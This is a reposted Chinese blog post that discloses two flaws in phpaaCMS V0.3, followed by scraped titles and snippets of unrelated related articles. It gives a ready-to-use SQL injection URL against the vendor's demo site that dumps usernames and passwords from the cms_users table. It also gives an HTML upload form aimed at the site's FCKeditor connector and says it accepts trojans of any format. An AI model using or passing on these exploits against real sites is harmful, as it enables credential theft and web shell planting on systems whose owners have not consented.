偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
//您已经在您的SQL语法错误,检查手册,对应于你的MySQL语法的正确使用服务器版本附近'\ ''行1
哈哈既然爆错了,应该就戏了,继续猜字段 order by ,结果字段是15,但是又不知道数据库,马虎的去看了下官方的发现数据库是 cms_cms_users 在字段3和11分别是username 和 password
得出语句为:and%201=2%20union%20select%201,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users
看了看官方也存在这个:
EXP:
http://www.phpaa.cn/demo/phpaaCMS/show.php?id=155%20and%201=2%20union%20select%201,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users
 
漏洞2:
进去后台后 有个php的 Fckeditor编辑器 版本是2.4.2以下的吧。
EXP
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.phpaa.cn/include/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
可以上传任何格式的木马进去, 悲剧! 
本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/301004,如需转载请自行联系原作者

phpaaCMS V0.3 存在注射oday漏洞相关推荐

  1. phpaaCMS V0.3 存在注射oday漏洞 (图)

    偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个"'",没想到爆错了! You have an err ...

  2. 织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞

    微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋. Hackme论坛原创 转载请附带原文链接 作者: c4rp3nt3r ...

  3. 有sql漏洞的php脚本,DedeCms V57 plus/search.php 文件SQL注射0day漏洞脚本安全 -电脑资料...

    require_once(dirname(__FILE__)."/../include/common.inc.php"); require_once(DEDEINC."/ ...

  4. Netcms oday 漏洞

    原文地址:http://hi.baidu.com/artcracker/blog/item/682a1c24640ee37735a80f49.html 首先,我百度 "NetCms网站管理系 ...

  5. THINKPHP网站漏洞怎么修复解决

    THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查 ...

  6. Windows任意文件读取漏洞

    低权限用户或恶意程序能够读取目标Windows计算机上任何文件的内容,设想你取得了一个普通权限,还能干吗,用该漏洞作者SandboxEscaper的一句话来说,也许是密码文件,我不够聪明,不知道能干吗 ...

  7. 修改密码PHP博客,phpwind任意修改管理员密码漏洞

    漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统.因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱.但是80s ...

  8. 一次Oday提权批量拿取商城服务器root权限

    此问题影响范围巨大,涉及到所有通过niushop开发的商城,希望通过这篇文章能够引起大家的重视.(注:演示的所用商城已经修复了此漏洞) 严重性:特级 解决方案:1.在用户访问漏洞页时对其身份进行判断: ...

  9. 2007年100款最佳安全工具谱

    2007年100款最佳安全工具谱   在2000和2003年非常成功的推出了安全工具调查后,Insecure.Org 非常高兴为大家带来2006年度的安全工具调查.我-Fyodor对nmap-hack ...

最新文章

  1. 中国铁建内网漫游沦陷多个重要部门泄漏大量信息(redis+ssh-keygen免认证登录案例)...
  2. 算法导论chapter6 堆排序的代码
  3. RMI中部署时要注意的地方
  4. 3分钟了解数据库事务
  5. 【原理+实战+视频+源码】docker权限参数
  6. drupal8 表单_Drupal 8如何实现面向未来
  7. node ajax配置文件,如何存储Node.js部署设置/配置文件?
  8. 模型驱动开发 - 产品线架构的演进
  9. 对象 复制构造函数
  10. awk编程之数组、控制流(长期更新)
  11. ppt编写一个抽奖系统_PPT图片双屏抽奖系统现场主要操作流程介绍
  12. FSMC实现8080时序驱动SSD1963(LCD驱动芯片)--原理->编码
  13. 数组和集合的互相转换
  14. 适合用做公司官网WordPress主题风格免受权版本
  15. SQL45 将titles_test表名修改为 titles_2017
  16. java代码控制电脑发出警报_java – 如何使用警报构建器对话框显示消息
  17. 【JAVA】Java中switch的用法。
  18. 台湾国立大学郭彦甫Matlab教程笔记(5)structured programming
  19. 清晰理解红黑树的演变-红黑的含义
  20. Pulmonary--Detection7

热门文章

  1. 单应性矩阵和仿射变换_仿射变换透射变换单应性矩阵
  2. 网页设计和平面设计的区别在哪里
  3. java递归查询无限极分类_sqlserver实现树形结构递归查询(无限极分类)
  4. 图像格式转换:jpg批量转png
  5. 知识点滴 - 关于汉语学习的网络资源
  6. java计算工作日方法
  7. Linux CPU之mpstat
  8. gps定位信息mysql_GPS定位数据库表设计
  9. 图像分割 FCN(1):FCN网络讲解
  10. 字节流和字符流的转换